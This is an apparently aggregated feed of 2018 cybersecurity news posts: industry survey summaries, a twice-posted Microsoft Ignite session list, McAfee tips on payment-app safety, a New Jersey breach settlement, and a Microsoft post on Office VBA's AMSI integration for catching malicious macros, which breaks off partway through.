In my year-long research project, the F5 Labs’ 2018 Application Protection Report, I asked if security professionals used storage encryption for data and applications. About 19% of survey respondents said they didn’t do any while 39% said they used encryption most of the time and 42% said they used it some of the time. What I didn’t ask and should have asked (and I will ask next year) is how they defined storage encryption. It’s … More

The post What do you mean by storage encryption? appeared first on Help Net Security.

A law enforcement view of emerging cybercrime threats

Cybercriminals are adopting creative new techniques to target their victims at an unprecedented pace and are constantly seeking methods to avoid law enforcement detection. To stay ahead of them, law enforcement should target cybercriminals offering “off-the-shelf” cyber-attack services or products to make it more difficult for low-level cybercriminals to carry out high-level attacks. Europol’s fifth annual Internet Organised Crime Threat Assessment (IOCTA), offers a unique law enforcement view of the emerging threats and key developments … More

The post A law enforcement view of emerging cybercrime threats appeared first on Help Net Security.

How organizations overcome cybersecurity hiring challenges

A strong security-focused culture and adherence to best practices helps companies attract and retain cybersecurity talent. (ISC)² commissioned the study to better understand how successful organizations are overcoming the shortage of skilled cybersecurity talent in a demand-heavy, competitive recruitment environment. “The growing cybersecurity workforce gap has received a lot of media attention. What we haven’t heard as much about is how some companies are actually succeeding in building their security teams even in the face … More

The post How organizations overcome cybersecurity hiring challenges appeared first on Help Net Security.

Better security needed to harness the positive potential of AI

Despite heightened interest in enterprise deployment of artificial intelligence, only 40 percent of respondents to ISACA’s second annual Digital Transformation Barometer express confidence that their organizations can accurately assess the security of systems based on AI and machine learning. This becomes especially striking given the potential for serious consequences from maliciously trained AI; survey respondents identify social engineering, manipulated media content and data poisoning as the types of malicious AI attacks that pose the greatest … More

The post Better security needed to harness the positive potential of AI appeared first on Help Net Security.

How companies view their cyber exposure, and how they deal with it

The 2018 Travelers Risk Index found cyber risks are the No. 2 concern across all business sizes and industries, and the percentage of businesses reporting they have been the victim of a cyber attack has doubled. Despite all of this and the fact that 52 percent of respondents believe that suffering a cyber attack is inevitable, a majority of those surveyed reported not taking adequate steps to protect themselves. In the Travelers’ survey of more … More

The post How companies view their cyber exposure, and how they deal with it appeared first on Help Net Security.

Bitcoin Network Faced One-Two Punch of Inflation and DoS Threats

Bitcoin Core has emerged seemingly unscathed from a major vulnerability that threatened to shut down parts of the network in a denial-of-service (DoS) attack. But apparently, the bug was even worse than originally thought. According to a Bitcoin Core Full Disclosure Report, the issue included an “inflation vulnerability,” one in which if seized upon could […]

The post Bitcoin Network Faced One-Two Punch of Inflation and DoS Threats appeared first on Hacked: Hacking Finance.

Why identity verification needs to be a part of your digital transformation strategy

Smartphones and tablets are an indispensable part of daily life, and consumers expect nothing less than a streamlined mobile experience. With this in mind, businesses are focusing on digital transformation efforts in order to deliver an excellent customer experience. According to a recent Forrester report, 56 percent of companies said digitization is currently underway, and 38 percent of companies said digital transformation will have the greatest effect on business decisions over the next year. As … More

The post Why identity verification needs to be a part of your digital transformation strategy appeared first on Help Net Security.

Security priorities are shifting in response to increased cybersecurity complexity

The increased complexity of the IT environment, combined with increasingly sophisticated attacks and a rapidly evolving threat landscape, is causing organizations to invest more money in cybersecurity and start to focus on the impact of cyber threats and cybersecurity from a business perspective, according to a research report conducted by Enterprise Strategy Group (ESG). Reasons why cybersecurity has become more difficult One of the report’s key findings is that in many organizations (96 percent), the … More

The post Security priorities are shifting in response to increased cybersecurity complexity appeared first on Help Net Security.

Security data reveals worldwide malicious login attempts are on the rise

According to the Akamai 2018 State of the Internet / Security Credential Stuffing Attacks report, worldwide malicious login attempts are on the rise. Akamai detected approximately 3.2 billion malicious logins per month from January through April 2018, and over 8.3 billion malicious login attempts from bots in May and June 2018 – a monthly average increase of 30 percent. In total, from the beginning of November 2017 through the end of June 2018, researcher analysis … More

The post Security data reveals worldwide malicious login attempts are on the rise appeared first on Help Net Security.

Why voice fraud rates continue to rise with no signs of slowing down

Pindrop released its annual report detailing developments in fraud, the future of voice and the impact to customer service across various industries. In the report, Pindrop reveals the rate of voice fraud climbed over 350 percent from 2013 through 2017, with no signs of slowing down. Additionally, between 2016 and 2017, overall voice channel fraud increased by 47 percent, or one in every 638 calls. The year-over-year increase can be attributed to several causes, including … More

The post Why voice fraud rates continue to rise with no signs of slowing down appeared first on Help Net Security.

Get deeper into security at Microsoft Ignite 2018

This year at Microsoft Ignite, we will be making some exciting announcements, from new capabilities for identity management and information protection to powerful artificial intelligence (AI) innovations that can help you stay ahead of an often overwhelming surge in threats and security alerts.

Join us as we share best practices for current products, reveal highlights of our new offerings, and give you a glimpse of our future product vision.

Start by attending Satya Nadella's keynote. Then kickstart your security journey with this session: Microsoft Security: How the cloud helps us all be more secure featuring Rob Lefferts (GS008). We'll highlight what's new in Microsoft security and how our customers and partners are using the Microsoft Cloud to accelerate security and productivity. Watch our demo showcase to see for yourself how unique intelligence and new innovations from Microsoft can help you be more secure across your entire digital estate.

Here are just a few of the other sessions at Ignite that will showcase our security technology and the innovation we have invested in throughout 2018 and into 2019. Add them to your Session Scheduler and check out the Session Catalog for the full list. If you can't attend in person, you can watch the live stream starting on September 24 with on-demand sessions to follow.

  • Leveraging the power of Microsoft threat protection (BRK4000). Learn about the services that make up Microsoft threat protection and how they work together across data, endpoints, identities, and infrastructure.
  • Double your security team productivity without doubling capacity (BRK2251). Learn how automated threat protection and remediation works seamlessly out of the box, using AI to respond to alerts and help security teams solve capacity and skill-gap challenges.
  • How to build security applications using the Microsoft Graph Security API (WRK3006). The Microsoft Graph has been extended with a new Security Graph API. Join this lab to get started using the Security API, including creating and authenticating a new app and using sample code to query the API.
  • Azure Active Directory: New features and roadmap (BRK2254). Come to this can’t-miss session for anyone working with or considering their strategy for identity and access management in the cloud. Hear about the newest features and experiences across identity protection, conditional access, single sign-on, hybrid identity environments, managing partner and customer access, and more.
  • Using Microsoft Secure Score to harden your security position (BRK3247). In this session, we help you understand what your current security position is in products like Office 365 and Windows and show you how you can easily improve your position through the built-in recommendations.
  • Getting to a world without passwords (BRK3031). Get the latest info and demos on what’s new with FIDO2, WebAuthN, Azure Active Directory, Windows Hello, and Microsoft Authenticator to help you make passwords a relic of the past.
  • Accelerate deployment and adoption of Azure Information Protection (BRK3009). Learn all about best practices in deploying Azure Information Protection to help protect your sensitive data wherever it lives or travels.
  • Registering and managing apps through Microsoft Azure Portal and Microsoft Graph API (THR2079). Come learn how to register apps to sign in Azure AD and personal Microsoft accounts, manage these apps, and get access to APIs all through Azure Portal, Microsoft Graph API, and PowerShell.
  • Secure enterprise productivity with Office 365 threat protection services (BRK4001). Learn about the latest advances in services such as Exchange Online Protection (EOP), Advanced Threat Protection (ATP), and Threat Intelligence, and get a detailed roadmap of what's to come.
  • Simplify your IT management and level up with Microsoft 365 (GS004). Come and learn how Microsoft 365 will help you simplify your modern workplace, delight and empower your users, and protect and secure your corporate assets.
  • Managing devices with Microsoft Intune: what's new (BRK3036). Learn how Intune raises the bar once again for Android, Apple, and Windows device management, and hear more about the exciting new features and new use-cases announced at Ignite.
  • Elevate the security for all your cloud apps and services with the Microsoft Cloud App Security (CASB) solution (BRK2158). Gain visibility into your cloud apps and services with sophisticated analytics to identify and combat cyberthreats, and control how your ubiquitous data travels.

And one other exciting note: To see our solutions in action and gain access to a 6-month free trial of our EMS E5 solution, be sure to stop by the Microsoft Showcase for in-depth product demos and discussions with security experts.

For more Ignite news and updates, check back to our Secure Blog as we continue to highlight specific sessions and topics throughout the week.

The post Get deeper into security at Microsoft Ignite 2018 appeared first on Microsoft Secure.

Microsoft Secure: Get deeper into security at Microsoft Ignite 2018

This year at Microsoft Ignite, we will be making some exciting announcementsfrom new capabilities for identity management and information protection to powerful artificial intelligence (AI) innovations that can help you stay ahead of an often overwhelming surge in threats and security alerts.

Join us as we share best practices for current products, reveal highlights of our new offerings, and give you a glimpse of our future product vision.

Start by attending Satya Nadellas keynote. Then kickstart your security journey with this session: Microsoft Security: How the cloud helps us all be more secure featuring Rob Lefferts (GS008). Well highlight whats new in Microsoft security and how our customers and partners are using the Microsoft Cloud to accelerate security and productivity. Watch our demo showcase to see for yourself how unique intelligence and new innovations from Microsoft can help you be more secure across your entire digital estate.

Here are just a few of the other sessions at Ignite that will showcase our security technology and the innovation we have invested in throughout 2018 and into 2019. Add them to your Session Scheduler and check out the Session Catalog for the full list. If you cant attend in person, you can watch the live stream starting on September 24 with on-demand sessions to follow.

  • Leveraging the power of Microsoft threat protection (BRK4000). Learn about the services that make up Microsoft threat protection and how they work together across data, endpoints, identities, and infrastructure.
  • Double your security team productivitywithout doubling capacity (BRK2251). Learn how automated threat protection and remediation works seamlessly out of the box, using AI to respond to alerts and help security teams solve capacity and skill-gap challenges.
  • How to build security applications using the Microsoft Graph Security API (WRK3006). The Microsoft Graph has been extended with a new Security Graph API. Join this lab to get started using the Security API, including creating and authenticating a new app and using sample code to query the API.
  • Azure Active Directory: New features and roadmap (BRK2254). Come to this can’t-miss session for anyone working with or considering their strategy for identity and access management in the cloud. Hear about the newest features and experiences across identity protection, conditional access, single sign-on, hybrid identity environments, managing partner and customer access, and more.
  • Using Microsoft Secure Score to harden your security position (BRK3247). In this session, we help you understand what your current security position is in products like Office 365 and Windows and show you how you can easily increase your position though the built-in recommendations.
  • Getting to a world without passwords (BRK3031). Get the latest info and demos on what’s new with FIDO2, WebAuthN, Azure Active Directory, Windows Hello, and Microsoft Authenticator to help you make passwords a relic of the past.
  • Accelerate deployment and adoption of Azure Information Protection (BRK3009). Learn all about best practices in deploying Azure Information Protection to help protect your sensitive datawherever it lives or travels.
  • Registering and managing apps through Microsoft Azure Portal and Microsoft Graph API (THR2079). Come learn how to register apps to sign in Azure AD and personal Microsoft accounts, manage these apps, and get access to APIs all through Azure Portal, Microsoft Graph API, and PowerShell.
  • Secure enterprise productivity with Office 365 threat protection services (BRK4001). Learn about the latest advances in services such as Exchange Online Protection (EOP), Advanced Threat Protection (ATP), and Threat Intelligence, and get a detailed roadmap of what's to come.
  • Simplify your IT management and level up with Microsoft 365 (GS004). Come and learn how Microsoft 365 will help you simplify your modern workplace, delight and empower your users, and protect and secure your corporate assets.
  • Managing devices with Microsoft Intune: what's new (BRK3036). Learn how Intune raises the bar once again for Android, Apple, and Windows device management, and hear more about the exciting new features and new use-cases announced at Ignite.
  • Elevate the security for all your cloud apps and services with the Microsoft Cloud App Security (CASB) solution (BRK2158). Gain visibility into your cloud apps and services with sophisticated analytics to identify and combat cyberthreats, and control how your ubiquitous data travels.

And one other exciting note: To see our solutions in action and gain access to a 6-month free trial of our EMS E5 solution, be sure to stop by the Microsoft Showcase for in-depth product demos and discussions with security experts.

For more Ignite news and updates, check back to our Secure Blog as we continue to highlight specific sessions and topics throughout the week.

The post Get deeper into security at Microsoft Ignite 2018 appeared first on Microsoft Secure.

Radware Blog: Don’t Let Your Data Seep Through The Cracks: Cybersecurity For the Smart Home

Technology and wireless connectivity have forever changed households. While we don’t have the personal hovercrafts or jetpacks that we were promised as children, infinite connectivity has brought a whirlwind of “futuristic” benefits and luxuries few could have imagined even a decade ago. But more importantly, it has re-defined how the modern domicile needs to be […]

The post Don’t Let Your Data Seep Through The Cracks: Cybersecurity For the Smart Home appeared first on Radware Blog.

How do you protect digital channels from cyber threats?

A well-thought out and managed social media presence is a must for most companies and their workforce, but too few of them think about the potential repercussions of an attack targeting it. Social media is increasingly seen as a battleground, providing the platform for complex influence campaigns mounted by nation-states (Iran, Russia), various hacker groups to get their message out and to advertise their services, and attackers looking to trick other users into parting with … More

The post How do you protect digital channels from cyber threats? appeared first on Help Net Security.

Better security needed to harness the positive potential of AI, mitigate risks of attacks

Despite heightened interest in enterprise deployment of artificial intelligence, only 40 percent of respondents to ISACA’s second annual Digital Transformation Barometer express confidence that their organizations can accurately assess the security of systems based on AI and machine learning. This becomes especially striking given the potential for serious consequences from maliciously trained AI; survey respondents identify social engineering, manipulated media content and data poisoning as the types of malicious AI attacks that pose the greatest … More

The post Better security needed to harness the positive potential of AI, mitigate risks of attacks appeared first on Help Net Security.

Building security into DevOps versus bolting it on

In this podcast, Hari Srinivasan, Director of Product Management for Qualys, talks about building security into DevOps versus bolting it on, specifically for containers. Here’s a transcript of the podcast for your convenience. Hello! My name is Hari Srinivasan, Director of Product Management for Qualys, cloud and virtualization security. Welcome to this Help Net Security podcast. Today we’re going to talk about building security into DevOps versus bolting it on, specifically for containers. Containers are … More

The post Building security into DevOps versus bolting it on appeared first on Help Net Security.

Radware Blog: Millennials and Cybersecurity: Understanding the Value of Personal Data

From British Airways to Uber, recent data breaches have shown how valuable our data is to cybercriminals – and the lengths to which they will go to access it. The size and impact of these breaches has meant that topics once reserved for tech experts and IT personnel have transitioned into a more mainstream conversation. […]

The post Millennials and Cybersecurity: Understanding the Value of Personal Data appeared first on Radware Blog.

Malicious hacking activity increasingly targeting critical infrastructure

In this podcast, Andrew Ginter, VP of Industrial Security at Waterfall Security Solutions, and Edward Amoroso, CEO of TAG Cyber, talk about how the traditional focus of most hackers has been on software, but the historical focus of crime is on anything of value. It should come as no surprise, therefore, that as operational technology (OT) and industrial control system (ICS) infrastructure have become much more prominent components of national critical infrastructure, that malicious hacking … More

The post Malicious hacking activity increasingly targeting critical infrastructure appeared first on Help Net Security.

Why humans are necessary to the threat hunting process

For thousands of years, humans have worked to collect intelligence on their enemies. Intelligence gathering is not a new practice; in fact, it is one of the oldest war tactics dating back to biblical times, when warlords and army commanders used it to gain advantages over their rivals. However, the methods have changed as new technologies and new forms of “warfare” have been developed. In recent years, cyber-attacks have led to an entirely new host … More

The post Why humans are necessary to the threat hunting process appeared first on Help Net Security.

83% of SMB owners have no cash put aside to deal with the fallout from a cyber attack

Small businesses are leaving themselves exposed to significant financial risk from cybercrime by not having adequate measures in place to recover in the event of a cyber attack. That’s according to the findings of InsuranceBee’s Cyber Survey, which asked more than 1,000 SMBs how prepared they are to deal with cybercrime. Although the average cost for small and medium-sized businesses to recover from a cyber attack is estimated to be $120,000, 83% of SMBs do … More

The post 83% of SMB owners have no cash put aside to deal with the fallout from a cyber attack appeared first on Help Net Security.

Regtech to account for 40% of global compliance spend by 2023

A new study from Juniper Research has found that spending on Regtech platforms will exceed $115 billion by 2023, up from an estimated $18 billion in 2018. The research found increased regulatory pressures, as demonstrated by the recent GDPR implementation, are driving businesses towards Regtech to meet greater compliance challenges. According to the research, any heavily regulated business sector not prioritising Regtech adoption would risk damaging fines from failing to keep pace with regulatory changes. … More

The post Regtech to account for 40% of global compliance spend by 2023 appeared first on Help Net Security.

Guarding the Gate: Cybersecurity De-Mystified

With individuals, businesses and critical infrastructure increasingly becoming the target of cyber-attacks, cybersecurity today is a multifaceted challenge. As the saying goes, “There’s more than one way to skin a cat.” And if the cat equates to preventing, detecting or discovering disruptive data breaches and determining the root cause, the vendor community has certainly come […]… Read More

The post Guarding the Gate: Cybersecurity De-Mystified appeared first on The State of Security.

Infosecurity.US: Gerhard Jacob’s ‘Taking Stock: The Internet of Things and Machine Learning Algorithms at War’

Image Credit: Israeli Defense Forces, The IDF Desert Reconnaissance Battalion Training Exercises

Terrific blog post by Gerhard Jacobs, writing at the Imperva Cybersecurity blog, and discussing IoT and ML with Gilad Yehudai (Gilad is a Security Research Engineer at Imperva), this time where connected devices and machine learning both interact with and inform war fighting and warrior capabilities. Today's Must Read.

McAfee Blogs: Mobile and Digital Payments: Worth the Risk?

Thanks in part to the convenience that our mobile devices provide for us, much of the world now operates on instant gratification. From accessing information on the web to doing work, and now sending and receiving digital payments, our devices and applications support us while we’re on the go. Whether we’re paying a friend for dinner, our roommate for rent, or otherwise, many of us use peer-to-peer (P2P) mobile and digital payment apps rather than cash to settle our bills.

P2P mobile and digital payment apps like Cash App, PayPal, Venmo, and Zelle have changed the way we transfer money; today it’s faster, simpler, and easier than ever. In fact, they’re so popular that it’s estimated that in 2018, $700 billion will be transferred in this manner. With so much money being sent and received in this way, the ease of transfer begs the question, how secure are these apps?

While some have turned to using cryptocurrency and blockchain to curtail the known dangers of traditional mobile payment apps, recent cryptojacking incidents have proven that even this new technology is not foolproof when it comes to cybersecurity and the determination of cybercriminals. And while the convenience of digital payments can’t be denied, we seem to be prioritizing ease of use over security. Let’s take a look at how digital payments work, as well as their security implications.

How Digital Payments Work

P2P apps like Venmo, Cash App, and others essentially all work in the same way. Functioning as a digital wallet, users link the app to their bank accounts or credit and debit cards. Then the app adds or subtracts money as users receive or send a payment. From there, users can “cash out” their balance to their preferred destination, such as the account attached to a card or a bank account.

P2P Money Transfer Apps and Cybersecurity Concerns

On the surface, digital money transfers may seem harmless, when in fact, they could lead to a headache of unforeseen cybersecurity concerns. The good news is that most money transfer apps will reimburse you for fraudulent charges. However, if someone has physical access to your phone and you don’t keep it locked, they can send money to themselves or others and you won’t get that money back.

Aside from the obvious concern of losing your phone, if you use an unsecured network to transfer money, it’s easier for someone to launch a phishing attack to gain access to your data. That’s because some payment apps will send request links from other users to download the app on their device. These links can be manipulated by cybercriminals and are often just a letter or number off, so that the change goes unnoticed by day-to-day users. When clicked, a user can be redirected to a web page, presented with malware or a virus, and prompted to download it, giving an unfriendly host access to your financial information. Thankfully, using your data plan or a VPN rather than an unsecured or public Wi-Fi network can help create an extra layer of protection, making it more difficult for cybercriminals to access your sensitive data.

Lastly, there are often unforeseen holes in software that provide backdoor access to your financial information. Meticulously updating the software on your mobile device can help patch up known security issues, also making it easier to protect your data.

Tips to Stay Safe While Using Peer-to-Peer Money Transfer Apps

If you already use a peer-to-peer money transfer app or are on the fence about downloading one, here are some tips to take into account. By practicing multiple security habits simultaneously, your financial information is much more likely to remain safe on your devices and apps:

  • Set up additional security measures. P2P payment platforms require access to sensitive financial information. Check your account settings to see if you can enable multi-factor authentication, PIN/Password requirement, or use fingerprint recognition.
  • Check your preferred app’s permission or settings. Some might share information about your transactions on social media or on the platform itself, like Venmo. Make adjustments to these settings if and when you see fit.
  • Update your software and apps. It’s a best practice to update software and apps when prompted to help seal vulnerabilities when they’re found.
  • Be aware of where you are conducting your money transfers. Opt to use your data plan or a secure, private Wi-Fi network when using a P2P payment app. If you connect to public Wi-Fi, cybercriminals could use the holes in these networks to access your personal banking information and possibly your P2P app account. If you must use public Wi-Fi, then it’s a good idea to use a Virtual Private Network (VPN).
  • Confirm the deposit went through. When you receive a payment, that money is added to your in-system balance. This is where it will remain until you initiate the transfer to your bank account or use it for another transaction within the app. If you transfer the balance to your bank, confirm it went through. This could take anywhere from a few days to a week. If it takes longer, it’s worth investigating to stop suspicious behavior in its tracks.
  • Be wary of scammers and cybercriminals. If you don’t know the person to whom you are sending a digital transfer (say, to purchase tickets to an event), look for poor spelling or grammar from them and read links carefully. If something doesn’t look right, that’s often a tell-tale sign that you’re being led astray. Try to find an alternative way to pay, or better yet, find someone who is more trustworthy.

Interested in learning more about IoT and mobile security tips and trends? Stop by ProtectWhatMatters.online, follow @McAfee_Home on Twitter, and “Like” us on Facebook.

The post Mobile and Digital Payments: Worth the Risk? appeared first on McAfee Blogs.

Insurance experts expect higher cyber-related losses

Insurance companies are expecting increased cyber-related losses across all business lines over the next 12 months, driven by increasing reliance on technology and high-profile cyber-attacks, according to Willis Towers Watson. The survey reveals that over 60% of respondents estimate they are likely to incur more than one cyber-related loss for every hundred non-cyber covered losses over the next 12 months in all lines of business apart from workers’ compensation, compared to less than 50% in … More

The post Insurance experts expect higher cyber-related losses appeared first on Help Net Security.

Linus Torvalds Apologizes For His Rude Behavior—Takes Time Off

What just happened is definitely going to surprise you. Linus Torvalds—father of the Linux open-source operating system—finally admitted his behavior towards other developers in the Linux community was hurting people and Linux. In a surprising move this weekend, Torvalds apologized for insulting and abusing other developers for almost three decades and took a break from the open-source

ENISA launches Cybersecurity Strategies Evaluation Tool

The European Union Agency for Network and Information Security (ENISA) has launched a tool that will help EU Member States evaluate their priorities according to their National Cyber Security Strategies. ENISA supports EU Member States Since 2012, ENISA has been supporting the EU Member States to develop, implement and evaluate their National Cyber Security Strategies. To achieve this goal, ENISA has developed several tools, studies, guidelines and a group of experts. Initially, only 12 Member … More

The post ENISA launches Cybersecurity Strategies Evaluation Tool appeared first on Help Net Security.

How to create a Hall of Fame caliber cybersecurity playbook

Whether the sport is football, basketball or hockey, all the best coaches have playbooks and reports with the latest information on opponents. They study the playing field and never go into a game unprepared, spending hours fine-tuning strategies, whether that’s finding the perfect angle to swoop past defenders or knowing an offense’s weakness and stopping them dead in their tracks. Cybersecurity should be no different. Sure, you’re not a quarterback looking for a lane … More

The post How to create a Hall of Fame caliber cybersecurity playbook appeared first on Help Net Security.

Seizing cyber resilience mastery in financial services

Despite the volume of cyberattacks doubling in 2017, financial services firms are closing the gap on cyberattacks, having stopped four in five of all breach attempts last year, up from two-thirds in 2016, according to Accenture. However, firms will need to improve their security procedures to head off increasingly sophisticated attacks powered by new technologies. The study, “2018 State of Cyber Resilience for Financial Services,” is based on a survey of more than 800 enterprise … More

The post Seizing cyber resilience mastery in financial services appeared first on Help Net Security.

Awareness and tendency towards risky online behavior

Spanning Cloud Apps announced the results of a survey of over 400 full-time U.S. employees on their awareness of and tendency towards risky online behavior. The study measured U.S. workers’ risk aversion for a range of behaviors, including use of online account credentials, susceptibility to phishing attacks and potential for data loss. It found that, while employees are generally risk averse, more than half (55 percent) admitted to clicking links they didn’t recognize, 45 percent … More

The post Awareness and tendency towards risky online behavior appeared first on Help Net Security.

The State of Security: 80 Percent of US Adults Have Never Considered Cybersecurity Careers, Survey Finds

Cyberattacks hit record highs last year, with nearly 160,000 cyber incidents reported and seven billion records exposed in the first three quarters of 2017, according to Online Trust Alliance’s Cyber Incidents and Breaches Trends Report. With the ubiquity of cyberattacks comes a need for more professionals. However, skilled individuals who are not already in the […]… Read More

The post 80 Percent of US Adults Have Never Considered Cybersecurity Careers, Survey Finds appeared first on The State of Security.

Software Company Settles with New Jersey AG Over Data Breach

On September 7, 2018, the New Jersey Attorney General announced a settlement with data management software developer Lightyear Dealer Technologies, LLC, doing business as DealerBuilt, resolving an investigation by the state Division of Consumer Affairs into a data breach that exposed the personal information of car dealership customers in New Jersey and across the country. The breach occurred in 2016, when a researcher exposed a gap in the company’s security and gained access to unencrypted files containing names, addresses, Social Security numbers, driver’s license numbers, bank account information and other data belonging to thousands of individuals, including at least 2,471 New Jersey residents.

To resolve the investigation, DealerBuilt agreed to undertake a number of changes to its security practices to help prevent similar breaches from occurring in the future, including:

  • the creation of an information security program to be implemented and maintained by a chief security officer;
  • the maintenance and implementation of encryption protocols for personal information stored on laptops or other portable devices or transmitted wirelessly;
  • the maintenance and implementation of policies that clearly define which users have authorization to access its computer network;
  • the maintenance of enforcement mechanisms to approve or disapprove access requests based on those policies; and
  • the maintenance of data security assessment tools, including vulnerability scans.

In addition to the above, DealerBuilt agreed to an $80,784 settlement amount, comprised of $49,420 in civil penalties and $31,364 in reimbursement of the Division’s attorneys’ fees, investigative costs and expert fees.

Read the consent order resolving the investigation.

Break out of malware myopia by focusing on the fundamentals

Organizations today suffer from malware myopia, a condition characterized by threat-centric security programs caused by the ease of imagining a takedown by malicious code. Malware myopia is a mental bug; a defect in reasoning that scrambles people’s judgment. If asked point-blank, few would say that malware is an existential threat. To be sure, it is vital to acknowledge that an attacker only has to be ‘right’ once, and given eye-catching headlines surrounding new forms of … More

The post Break out of malware myopia by focusing on the fundamentals appeared first on Help Net Security.

How to gain visibility with global IT asset inventory

In this podcast recorded at Black Hat USA 2018, Pablo Quiroga, Director of Product Management at Qualys, talks about how to gain unprecedented visibility with global IT asset inventory. Here’s a transcript of the podcast for your convenience. My name is Pablo Quiroga. I’m the Director of Product Management at Qualys, and today I’m going to be speaking about how to gain unprecedented visibility with global IT asset inventory. A complete visibility of your IT … More

The post How to gain visibility with global IT asset inventory appeared first on Help Net Security.

Data privacy automation: Unlock your most valuable asset

In years past, data privacy was the purview of the chief privacy officer. However, increasingly, CTOs are being tasked with operationalizing a data privacy solution for the company. That’s because data privacy is fundamentally a data issue, with privacy being an outcome of a comprehensive data protection strategy. In a world of exploding data, it’s impossible for privacy professionals using manual, survey-based approaches to stay on top of this ever-changing sea of information. Companies constantly … More

The post Data privacy automation: Unlock your most valuable asset appeared first on Help Net Security.

It’s Time to Adopt AI in Your Security Operations Center

Security analysts: We know you’re overworked, understaffed and overwhelmed, and we understand that it’s not your fault. It’s not humanly possible for you to keep up with the ever-expanding threat landscape, especially given how busy you are with the day-to-day tasks of running your security operations center (SOC). We want you to know you’re not alone.

The Cybersecurity Skills Gap Is Only Getting Worse

According to research performed by the Enterprise Strategy Group, almost 51 percent of organizations in 2018 reported a “problematic shortage” of cybersecurity skills. Cybersecurity job fatigue is real, and according to ESG, almost 38 percent of security professionals claimed that the skills shortage has led to burnout and staff attrition. If you’re waiting for your job to magically become easier, you may want to think again; the situation is only getting worse.

Sure, the cybersecurity skills shortage and an ever-expanding threat landscape are valid excuses, but they’re not going to pay the bills when — not if — a data breach occurs. The Ponemon Institute found that the average total cost of a data breach rose from $3.62 million to $3.86 million in 2018, an increase of 6.4 percent from 2017.

Shorter Dwell Times Mean Lower Costs

According to Ponemon, organizations that identified a breach in less than 100 days saved more than $1 million as compared to those that exceeded 100 days. Similarly, organizations that contained a breach in less than 30 days saved over $1 million as compared to those that took more than 30 days to resolve.

Simple, right? Identify the breach quickly and contain it to save your organization money. However, doing this when you receive more than 1 million daily security alerts is a daunting task, even for the best analysts. For those of you who aren’t security analysts, imagine having to sort and filter through a million emails in your inbox each day to figure out which require action and which are junk.

As a result, 30 percent of respondents to an Imperva survey admitted to having ignored certain categories of alerts, while 4 percent turned off the alert notifications altogether. Additionally, 56 percent admitted to having ignored an alert based on past experiences dealing with false positives.

Why You Should Adopt AI in the Security Operations Center

So, how do you combat cybersecurity job fatigue? Your best bet is to partner with artificial intelligence (AI) to force-multiply your team’s efforts in the security operations center. Here’s how to do it:

  • Automate incident analysis. Don’t waste human capital on routine analysis. Instead, let AI automate your repetitive SOC tasks while your team focuses on mission-critical decisions, such as suspicious behavior from insider threats.
  • Augment human intelligence. Upgrade your SOC by using AI to automatically find commonalities across incidents using cognitive reasoning to provide actionable feedback with context to your analysts.
  • Respond rapidly to threats. Reduce dwell times with automated hunting for indicators and add pertinent information to act on escalations for remediation and/or blocking.

Register for the exclusive webinar, “5 Reasons AI Is the Pillar of the Next-Gen SOC,” to learn about the top five challenges plaguing today’s SOCs and how security leaders can free up their analysts by leveraging AI technologies to focus on crucial threats.

The post It’s Time to Adopt AI in Your Security Operations Center appeared first on Security Intelligence.

Office VBA + AMSI: Parting the veil on malicious macros

As part of our continued efforts to tackle entire classes of threats, Office 365 client applications now integrate with Antimalware Scan Interface (AMSI), enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior.

Macro-based threats have always been a prevalent entry point for malware, but we have observed a resurgence in recent years. Continuous improvements in platform and application security have led to the decline of software exploits, and attackers have found a viable alternative infection vector in social engineering attacks that abuse functionalities like VBA macros. Microsoft, along with the rest of the industry, observed attackers transition from exploits to using malicious macros to infect endpoints. Malicious macros have since shown up in commodity malware campaigns, targeted attacks, and red-team activities.

Figure 1. Prevalence of the exploit vs macro attack vector observed via Windows Defender ATP telemetry

To counter this threat, we invested in building better detection mechanisms that expose macro behavior through runtime instrumentation within our threat protection solutions in the cloud. We're bringing this instrumentation directly into Office 365 client applications. More importantly, we're exposing this capability through AMSI, an open interface, making it accessible to any antivirus solution.

Obfuscation and other forms of detection evasion

Macros are popular among attackers because of the rich capabilities that the VBA runtime exposes and the privileged context in which macros execute. Notably, as with all scripting languages, attackers have another advantage: they can hide malicious code through obfuscation.

To evade detection, malware needs to hide intent. The most common way that attackers do this is through code obfuscation. Macro source code is easy to obfuscate, and a plethora of free tools are available for attackers to do this automatically. The result is polymorphic malware, with evolving obfuscation patterns and multiple obfuscated variants of the same malicious macro.

There's more: malicious code can be taken out of the macro source and hidden in other document components like text labels, forms, Excel cells, and others. Or why hide at all? A small piece of malicious code can be embedded somewhere in a huge legitimate source and keep a low profile.

How can antivirus and other security solutions cope? Today, antivirus solutions can extract and scan the obfuscated macro source code from an Office document, but how can the macro's intent be exposed? What if security solutions could observe a macro's behavior at runtime and gain visibility into its system interactions? Enter Office and AMSI integration.

AMSI on Windows 10

If AMSI rings a bell, it's because we talked about how PowerShell adopted AMSI in a blog post when AMSI was introduced back in 2015.

Antimalware Scan Interface (AMSI) is an open interface available on Windows 10 for applications to request, at runtime, a synchronous scan of a memory buffer by an installed antivirus or security solution. Any application can interface with AMSI and request a scan for any data that may be untrusted or suspicious.

Any antivirus can become an AMSI provider and inspect data sent by applications via the AMSI interface. If the content submitted for scan is detected as malicious, the requesting application can take action to deal with the threat and ensure the safety of the device. To learn more, refer to the AMSI documentation.

AMSI also integrates with the JavaScript, VBScript, and PowerShell scripting engines. Over the years, we have been steadily increasing our investments in providing security solutions with deeper visibility into script-based threats. Insights seen via AMSI are consumed by our own security products. The new Office and AMSI integration is yet another addition to the arsenal of protection against script-based malware. Windows Defender Advanced Threat Protection (Windows Defender ATP) leverages AMSI and machine learning to combat script-based threats that live off the land (read our previous blog post to learn more).

Office VBA integration with AMSI

The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection.

Figure 2. Runtime scanning of macros via AMSI

Logging macro behavior

The VBA language offers macros a rich set of functions that can be used to interface with the operating system: run commands, access the file system, and so on. Additionally, it allows macros to issue direct calls to COM methods and Win32 APIs. The VBA scripting engine handles calls from macro code to COM and APIs via internal interfaces that implement the transition between the caller and the callee. These interfaces are instrumented such that the behavior of a macro is trapped and all relevant information, including the function name and its parameters, is logged in a circular buffer.

This monitoring is not tied to specific functions; it's generic and works on any COM method or Win32 API. The logged calls can come in two formats:

  • <COM_Object>.<COM_Method>(Parameter 1, …, Parameter n);
  • <API_or_function_Name>(Parameter 1, …, Parameter n);

